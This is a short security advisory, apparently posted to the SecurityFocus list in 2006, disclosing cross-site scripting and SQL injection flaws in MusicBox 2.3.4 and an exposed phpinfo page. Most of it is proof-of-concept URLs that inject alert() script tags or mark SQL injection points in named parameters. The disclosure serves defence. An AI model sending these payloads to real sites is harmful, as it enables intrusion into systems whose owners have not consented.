MusicBox <= 2.3.4 XSS SQL injection Vulnerability Jul 24 2006 04:00PM
securityconnection gmail com
MusicBox 2.3.4

http://www.musicboxv2.com

------------

PHPinfo page

------------

/phpinfo.php

--------------------------

Cross Site Scripting (XSS)

--------------------------

http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>
&page=0

http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)
</script>&page=0

http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/
)</script>&in=song&action=search&start=0

http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/Ell
ipsisSecurityTest/)</script>

http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSe
curityTest/)</script>&type=Artists

-------------

SQL injection

-------------

http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQ
L]

http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists

http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]

-----------------

Ellipsis Security

http://www.ellsec.org

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus